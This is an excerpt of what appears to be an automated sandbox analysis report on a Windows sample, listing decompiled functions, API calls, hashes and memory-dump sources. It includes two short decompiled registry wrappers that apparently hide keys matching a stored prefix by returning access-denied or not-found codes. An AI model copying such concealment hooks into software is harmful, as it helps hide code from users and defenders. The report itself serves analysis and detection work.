                                                                                                        • Opcode Fuzzy Hash: ad7cdc050d6d036067b52ba923455fdbf00309b4b3e98ceb8ab4ad11cba69231
                                                                                                        • Instruction Fuzzy Hash: 354138B2801118AFDB05DF94DD95DEEBBB8FF54308F10402EF501A7290DA309E46CB64
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 70988140, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34registryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E70988140(void* _a4, WCHAR* _a8, int _a12, short* _a16, int _a20, int _a24, struct _SECURITY_ATTRIBUTES* _a28, void** _a32, int* _a36) {
				long _t12;
				WCHAR* _t13;
				WCHAR* _t22;

				_t22 = _a8;
				if(_t22 == 0) {
					L3:
					_t12 = RegCreateKeyExW(_a4, _t22, _a12, _a16, _a20, _a24, _a28, _a32, _a36); // executed
					return _t12;
				} else {
					_t13 =  *0x7098f5fc; // 0x78645c
					if(StrCmpNIW(_t22, _t13, 0x1c) != 0) {
						goto L3;
					} else {
						return 5;
					}
				}
			}






                                                                                                        0x70988141
                                                                                                        0x70988147
                                                                                                        0x70988165
                                                                                                        0x7098818e
                                                                                                        0x70988195
                                                                                                        0x70988149
                                                                                                        0x70988149
                                                                                                        0x7098815a
                                                                                                        0x00000000
                                                                                                        0x7098815c
                                                                                                        0x70988162
                                                                                                        0x70988162
                                                                                                        0x7098815a

                                                                                                        APIs
                                                                                                        • StrCmpNIW.SHLWAPI(?,0078645C,0000001C), ref: 70988152
                                                                                                        • RegCreateKeyExW.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 7098818E
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.551730997.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.551712171.0000000070980000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551756124.000000007098C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551776083.000000007098F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551813080.0000000070990000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: Create
                                                                                                        • String ID: \dx
                                                                                                        • API String ID: 2289755597-3316144491
                                                                                                        • Opcode ID: 9efec9325f18a91be68861c63cdbcc015a3e83ada42d9726ba8aaf8ca438437a
                                                                                                        • Instruction ID: 999f58af06162affec7ba942892c39f0be09e153396095724509c7c81a45e199
                                                                                                        • Opcode Fuzzy Hash: 9efec9325f18a91be68861c63cdbcc015a3e83ada42d9726ba8aaf8ca438437a
                                                                                                        • Instruction Fuzzy Hash: ECF0F9B2218210AFD204CB49DC44EABB3E9BBDC714F148A0CB58993394D634ED018BA2
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 709881A0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26registryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E709881A0(void* _a4, WCHAR* _a8, int _a12, int _a16, void** _a20) {
				long _t7;
				WCHAR* _t8;
				WCHAR* _t14;

				_t14 = _a8;
				if(_t14 == 0) {
					L3:
					_t7 = RegOpenKeyExW(_a4, _t14, _a12, _a16, _a20); // executed
					return _t7;
				} else {
					_t8 =  *0x7098f5fc; // 0x78645c
					if(StrCmpNIW(_t14, _t8, 0x1c) != 0) {
						goto L3;
					} else {
						return 2;
					}
				}
			}






                                                                                                        0x709881a1
                                                                                                        0x709881a7
                                                                                                        0x709881c5
                                                                                                        0x709881da
                                                                                                        0x709881e1
                                                                                                        0x709881a9
                                                                                                        0x709881a9
                                                                                                        0x709881ba
                                                                                                        0x00000000
                                                                                                        0x709881bc
                                                                                                        0x709881c2
                                                                                                        0x709881c2
                                                                                                        0x709881ba

                                                                                                        APIs
                                                                                                        • StrCmpNIW.SHLWAPI(?,0078645C,0000001C), ref: 709881B2
                                                                                                        • RegOpenKeyExW.KERNEL32(?,?,?,?,?), ref: 709881DA
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.551730997.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.551712171.0000000070980000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551756124.000000007098C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551776083.000000007098F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551813080.0000000070990000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: Open
                                                                                                        • String ID: \dx
                                                                                                        • API String ID: 71445658-3316144491
                                                                                                        • Opcode ID: 8d63f9e97ab82c4830b77a8dadaa432f46c5efde2603d87ee7779406a584ae93
                                                                                                        • Instruction ID: 251fad6f7bffe205a057e1ce70969811e038e2dda84d95865805c99d8a80d119
                                                                                                        • Opcode Fuzzy Hash: 8d63f9e97ab82c4830b77a8dadaa432f46c5efde2603d87ee7779406a584ae93
                                                                                                        • Instruction Fuzzy Hash: AEE06DB2218210AFD200DF05DC48EAB77ADEBA8710F00891CB502C7391C730DC01DBB2
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 004D8737, Relevance: 4.6, APIs: 3, Instructions: 69registryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • __EH_prolog3.LIBCMT ref: 004D873E
                                                                                                        • RegQueryValueExW.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,00000008,004DDF46,?), ref: 004D8775
                                                                                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,00000000,?,?,?,?,?,00000008,004DDF46,?), ref: 004D87C1
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.509744756.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.509650373.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515647871.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515742168.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515756354.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515787319.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515804863.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515815619.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516318953.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516679484.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517321522.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517911473.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518414023.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518531967.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518553264.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518570449.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518790814.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: QueryValue$H_prolog3
                                                                                                        • String ID:
                                                                                                        • API String ID: 1173560166-0
                                                                                                        • Opcode ID: bf98dc2cb7e606dd0cb7f73c725bf64da49d57b819058fa11df5d16876d1f819
                                                                                                        • Instruction ID: 0f4af20211d2536596288c9866dec7b9355c8039161fb1f7cf1f228bb3b07186
                                                                                                        • Opcode Fuzzy Hash: bf98dc2cb7e606dd0cb7f73c725bf64da49d57b819058fa11df5d16876d1f819
                                                                                                        • Instruction Fuzzy Hash: A8214530A0021AAFDF14DF54CC51AEE7BA4FB49314F10421EF814AB390DB30AA06CBA4
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 004BED5B, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 57COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • __EH_prolog3.LIBCMT ref: 004BED62
                                                                                                          • Part of subcall function 004B5743: __EH_prolog3.LIBCMT ref: 004B574A
                                                                                                          • Part of subcall function 004B5743: LoadStringW.USER32(10000000,?,00000000,00000100), ref: 004B5794
                                                                                                          • Part of subcall function 004B5743: LoadStringW.USER32(?,?,00000000,00000100), ref: 004B57CB
                                                                                                          • Part of subcall function 004A1B0C: __EH_prolog3.LIBCMT ref: 004A1B13
                                                                                                          • Part of subcall function 004A1B0C: InitializeCriticalSection.KERNEL32(?,00000004,00506D47,PingThread,00000000,00000068), ref: 004A1B28
                                                                                                          • Part of subcall function 0040E8A9: __EH_prolog3.LIBCMT ref: 0040E8B0
                                                                                                        Strings
                                                                                                        • Callbacks.setLoggedIn: StatusChanged callback not set, xrefs: 004BEDEB
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.509744756.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.509650373.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515647871.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515742168.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515756354.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515787319.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515804863.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515815619.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516318953.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516679484.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517321522.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517911473.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518414023.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518531967.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518553264.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518570449.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518790814.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: H_prolog3$LoadString$CriticalInitializeSection
                                                                                                        • String ID: Callbacks.setLoggedIn: StatusChanged callback not set
                                                                                                        • API String ID: 1365085155-3560364928
                                                                                                        • Opcode ID: 49f3f3c0ba0ca473770653ee1f453d12080e029ebbb15d6f11e871ab516f9357
                                                                                                        • Instruction ID: 9c5ed2ad15826aa4861ff9567c9ec0502a483661ad412179d4508a200c259eb2
                                                                                                        • Opcode Fuzzy Hash: 49f3f3c0ba0ca473770653ee1f453d12080e029ebbb15d6f11e871ab516f9357
                                                                                                        • Instruction Fuzzy Hash: 97113670A48384AADB04FF7E845F7DD3F649B81324F24426EF1461B2C2CA795646C3BA
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 004BEE12, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 43COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • __EH_prolog3.LIBCMT ref: 004BEE19
                                                                                                          • Part of subcall function 004BEB0F: __EH_prolog3.LIBCMT ref: 004BEB16
                                                                                                        Strings
                                                                                                        • Callbacks.setStatus: StatusChanged callback not set, xrefs: 004BEE6A
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.509744756.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.509650373.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515647871.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515742168.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515756354.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515787319.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515804863.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515815619.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516318953.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516679484.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517321522.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517911473.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518414023.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518531967.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518553264.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518570449.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518790814.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: H_prolog3
                                                                                                        • String ID: Callbacks.setStatus: StatusChanged callback not set
                                                                                                        • API String ID: 431132790-2963191105
                                                                                                        • Opcode ID: db2f84261a7861829ce49a702f0df8fbebb0c0e8b576336d6d780dc387f079b6
                                                                                                        • Instruction ID: c59b0351dd309f1b71822a8ba55792cf84c31506fae73b7dcfcbdcd58a86ebb2
                                                                                                        • Opcode Fuzzy Hash: db2f84261a7861829ce49a702f0df8fbebb0c0e8b576336d6d780dc387f079b6
                                                                                                        • Instruction Fuzzy Hash: 1B01F570A0520CEEDF01EFBA8416ACD3F20AF95348F00416EF441672C2CB39AA04D76A
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 004C8D4A, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 38COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetUserNameW.ADVAPI32(00000000,?), ref: 004C8D74
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.509744756.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.509650373.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515647871.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515742168.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515756354.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515787319.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515804863.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515815619.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516318953.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516679484.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517321522.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517911473.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518414023.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518531967.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518553264.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518570449.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518790814.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: NameUser
                                                                                                        • String ID: SYSTEM
                                                                                                        • API String ID: 2645101109-968218125
                                                                                                        • Opcode ID: f2d0c15b9cbee4fb0164b4bb1787badd06f2cc0894c081d546beca36d9aecee2
                                                                                                        • Instruction ID: 8d76b25c0fe8f0f1dbb5fc085cbb019824d070a5432563be1b2d5d077a60250b
                                                                                                        • Opcode Fuzzy Hash: f2d0c15b9cbee4fb0164b4bb1787badd06f2cc0894c081d546beca36d9aecee2
                                                                                                        • Instruction Fuzzy Hash: 90E022737821143BEB04AAB8AD4BEFE379CEB41350F00112AF103DB1C1F9E66E114AA4
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 004D849A, Relevance: 3.0, APIs: 2, Instructions: 34registryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • __EH_prolog3.LIBCMT ref: 004D84A1
                                                                                                        • RegQueryValueExW.KERNEL32(?,?,00000000,00000000,?,00000004,?,?,?,?,?,00000008,004C3112,Logging), ref: 004D84D4
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.509744756.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.509650373.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515647871.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515742168.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515756354.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515787319.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515804863.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515815619.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516318953.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516679484.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517321522.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517911473.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518414023.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518531967.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518553264.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518570449.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518790814.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: H_prolog3QueryValue
                                                                                                        • String ID:
                                                                                                        • API String ID: 2373586757-0
                                                                                                        • Opcode ID: 874c322596580d687edbcaf558f01c4382845078c03a7eac1498aed0b75da13a
                                                                                                        • Instruction ID: 0dd975fd7c406d8fed742dab09b0d1048cfa1e638da5dc08f150b9124276a540
                                                                                                        • Opcode Fuzzy Hash: 874c322596580d687edbcaf558f01c4382845078c03a7eac1498aed0b75da13a
                                                                                                        • Instruction Fuzzy Hash: 98F03C3190021AABDF15CF90CD14AEE7FB4FF55758F40821EF555A6290DB748A09CBA4
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 004D85BC, Relevance: 3.0, APIs: 2, Instructions: 33registryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • __EH_prolog3.LIBCMT ref: 004D85C3
                                                                                                        • RegQueryValueExW.KERNEL32(?,?,00000000,00000000,?,00000004,00000008,004C2410), ref: 004D85F6
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.509744756.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.509650373.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515647871.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515742168.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515756354.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515787319.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515804863.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515815619.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516318953.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516679484.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517321522.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517911473.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518414023.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518531967.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518553264.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518570449.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518790814.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: H_prolog3QueryValue
                                                                                                        • String ID:
                                                                                                        • API String ID: 2373586757-0
                                                                                                        • Opcode ID: 9b9bf73b0c61a39bc823f8158bcb118f925f4112f82c39382568b391d3e62551
                                                                                                        • Instruction ID: 5b0d46b2eaf9db0c8e34daec1bb3c68aedab5a910da052f1160804802a4cabbb
                                                                                                        • Opcode Fuzzy Hash: 9b9bf73b0c61a39bc823f8158bcb118f925f4112f82c39382568b391d3e62551
                                                                                                        • Instruction Fuzzy Hash: E8F0493190021AABDB14CF84CD15AEE7B75FF84724F40861EF915BB290DB709E06CB94
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 005428AD, Relevance: 3.0, APIs: 2, Instructions: 16threadCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • __freeptd.LIBCMT ref: 005428D5
                                                                                                        • ExitThread.KERNEL32 ref: 005428DF
                                                                                                          • Part of subcall function 0054B6F0: __FindPESection.LIBCMT ref: 0054B749
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.509744756.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.509650373.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515647871.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515742168.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515756354.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515787319.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515804863.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515815619.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516318953.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516679484.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517321522.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517911473.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518414023.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518531967.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518553264.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518570449.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518790814.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: ExitFindSectionThread__freeptd
                                                                                                        • String ID:
                                                                                                        • API String ID: 3875298718-0
                                                                                                        • Opcode ID: bf38d6aade445fd683fc23250041e958ab305ed77acaeb1038a3e994e673a00d
                                                                                                        • Instruction ID: f91b78106646ab00efe3f5564bb3c9c902be208e6bd20ba3e857690153520d16
                                                                                                        • Opcode Fuzzy Hash: bf38d6aade445fd683fc23250041e958ab305ed77acaeb1038a3e994e673a00d
                                                                                                        • Instruction Fuzzy Hash: CED09E301047129AF7347B759D0E7DD7FA4BF8074AF544424F544940B1DBB89D84CD25
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 004DDFDE, Relevance: 1.7, APIs: 1, Instructions: 178COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • __EH_prolog3_GS.LIBCMT ref: 004DDFE5
                                                                                                          • Part of subcall function 004DDEF8: __EH_prolog3.LIBCMT ref: 004DDEFF
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.509744756.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.509650373.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515647871.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515742168.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515756354.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515787319.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515804863.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515815619.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516318953.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516679484.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517321522.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517911473.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518414023.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518531967.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518553264.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518570449.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518790814.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: H_prolog3H_prolog3_
                                                                                                        • String ID:
                                                                                                        • API String ID: 3355343447-0
                                                                                                        • Opcode ID: b07a31e5cfdd752767145d746ef343b594f45c7c123593b7a97ea218bd4d441d
                                                                                                        • Instruction ID: 6a24a258222711af561e351bfa2156e0ab07941e5c0c7c21904ef7ec1e558bfd
                                                                                                        • Opcode Fuzzy Hash: b07a31e5cfdd752767145d746ef343b594f45c7c123593b7a97ea218bd4d441d
                                                                                                        • Instruction Fuzzy Hash: 38719030D0528CEBCF01EBE9C965AEDBB75AF11308F1440AEE0416B296DB791F09D766
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 005075E8, Relevance: 1.6, APIs: 1, Instructions: 101COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • __EH_prolog3.LIBCMT ref: 005075EF
                                                                                                          • Part of subcall function 004A17E8: __EH_prolog3.LIBCMT ref: 004A17EF
                                                                                                          • Part of subcall function 004A17E8: InitializeCriticalSection.KERNEL32(?,00000004,00506D6D,?,?,PingThread,00000000,00000068), ref: 004A1804
                                                                                                          • Part of subcall function 005072B5: __EH_prolog3.LIBCMT ref: 005072BF
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.509744756.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.509650373.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515647871.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515742168.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515756354.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515787319.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515804863.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515815619.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516318953.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516679484.0000000000810000.00000004.00020000.sdmp Download File
